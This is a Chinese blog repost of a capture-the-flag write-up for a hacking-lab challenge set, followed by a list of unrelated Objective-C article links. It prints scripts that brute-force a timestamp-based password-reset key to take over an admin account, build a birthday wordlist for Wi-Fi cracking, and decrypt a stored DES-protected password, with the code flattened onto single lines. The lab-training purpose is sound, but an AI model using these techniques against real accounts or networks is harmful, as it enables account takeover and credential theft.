博客
关于我
hakcinglab解密关WP
阅读量:731 次
发布时间:2019-03-21

本文共 2408 字,大约阅读时间需要 8 分钟。

解密关(https://zhuanlan.zhihu.com/p/21740238)

  • 以管理员身份登录系统
    重置密码时用 burp 抓包,返回包的内容注意。在发现一个 sukey,与 username 连在一起后,尝试用 md5 解密竟然是时间戳。这让我明白了其中的原理,跑个 python 只能解决问题了。
  • 实现代码

    import requestsimport hashlibimport timese = requests.session()headers = {    'Cookie': 'PHPSESSID=aa06ee795e15f980a7d40a8c7331376a'}while 1:    sukey = hashlib.new('md5', str(time.time())).hexdigest()    url = f'http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey={sukey}&username=admin'    r = se.get(url, headers=headers)    time.sleep(0.5)    if r.content:        print(r.content)        break    else:        print(f'Cracking: {sukey}')
    1. 邂逅对门的妹纸
      提示妹子上大三,根据出生年份差不多就能推断大致时间,利用生日年月日的八位数生成字典用 EWSA 爆破即可。
    2. 生成字典的脚本

      with open('pass.txt', 'a') as dic:    for year in range(1980, 2015):        for mon in range(1, 13):            for day in range(1, 32):                print('%d%02d%02d' % (year, mon, day))                dic.write('%d%02d%02d\n' % (year, mon, day))
      1. 万恶的 Cisco 在线破解就可以了

        -http://www.ifm.net.nz/cookbooks/passwordcracker.html

      2. 万恶的加密

        Google 找到如下脚本,跑一下就行了。

      3. 加密解密脚本

        from Crypto.Cipher import DESdef decode_char(c):    if c == 'a':        r = '?'    else:        r = c    return ord(r) - ord('!')    def ascii_to_binary(s):    assert len(s) == 24    out = [0] * 18    i = 0    j = 0    for i in range(0, len(s), 4):        y = decode_char(s[i])        y = (y << 6) & 0xffffff        k = decode_char(s[i+1])        y = (y | k) & 0xffffff        y = (y << 6) & 0xffffff        k = decode_char(s[i+2])        y = (y | k) & 0xffffff        y = (y << 6) & 0xffffff        k = decode_char(s[i+3])        y = (y | k) & 0xffffff        y = (y << 6) & 0xffffff        out[j+2] = chr(y & 0xff)        out[j+1] = chr((y >> 8) & 0xff)        out[j+0] = chr((y >> 16) & 0xff)        j += 3    return ''.join(out)def decrypt_password(p):    r = ascii_to_binary(p)    r = r[:16]    d = DES.new(b'\x01\x02\x03\x04\x05\x06\x07\x08', DES.MODE_ECB)    r = d.decrypt(r)    return r.rstrip(b'\x00')if __name__ == '__main__':    miwen = "aK9Q4I)J'#[Q=^Q`MAF4<1!!\""    print(u'明文' + decrypt_password(miwen))
        1. 喜欢泡网吧的小明
          winhex 打开 dump文件,看到70 以后的都是重复数据,应该没什么用,第一行数据混乱,看不出是什么东西,抹成 0 上传一下试试。
        2. 说明余额

          看到余额为 100 块,转为16进制是 64,数据里并没有这样的地方,仔细观察,分别转换几处不一样的数据,发现2710 转换为十进制是10000,原来是考虑了两位小数。。。那么把两处2710改为4e20 再试试。

          1. 异常数据

            写个脚本慢慢跑 base64吧。

          2. md5真的能碰撞嘛?

            源码有 txt,打开注意到==,是 php 的弱类型漏洞,百度构造 payload 即可。

          3. 小明爱上了一个搞硬件的小姑凉

            需要去官网下载软件才能直接得到 flag。

          4. 有签名限制的读取任意文件

            不会,划水飘过。

    转载地址:http://xoegz.baihongyu.com/

    你可能感兴趣的文章
    Objective-C实现factorial iterative阶乘迭代算法(附完整源码)
    查看>>
    Objective-C实现factorial recursive阶乘递归算法(附完整源码)
    查看>>
    Objective-C实现FigurateNumber垛积数算法(附完整源码)
    查看>>
    Objective-C实现Gale-Shapley盖尔-沙普利算法(附完整源码)
    查看>>
    Objective-C实现hamiltonianCycle哈密尔顿图算法(附完整源码)
    查看>>
    Objective-C实现hamming numbers汉明数算法(附完整源码)
    查看>>
    Objective-C实现hanning 窗(附完整源码)
    查看>>
    Objective-C实现hanoiTower汉诺塔算法(附完整源码)
    查看>>
    Objective-C实现hardy ramanujana定理算法(附完整源码)
    查看>>
    Objective-C实现highest response ratio next高响应比优先调度算法(附完整源码)
    查看>>
    Objective-C实现hill climbing爬山法用来寻找函数的最大值算法(附完整源码)
    查看>>
    Objective-C实现hornerMethod霍纳法算法(附完整源码)
    查看>>
    Objective-C实现Http Post请求(附完整源码)
    查看>>
    Objective-C实现Http协议下载文件(附完整源码)
    查看>>
    Objective-C实现IIR 滤波器算法(附完整源码)
    查看>>
    Objective-C实现IIR数字滤波器(附完整源码)
    查看>>
    Objective-C实现insertion sort插入排序算法(附完整源码)
    查看>>
    Objective-C实现integer partition整数分区算法(附完整源码)
    查看>>
    Objective-C实现integerPartition整数划分算法(附完整源码)
    查看>>
    Objective-C实现interpolation search插值搜索算法(附完整源码)
    查看>>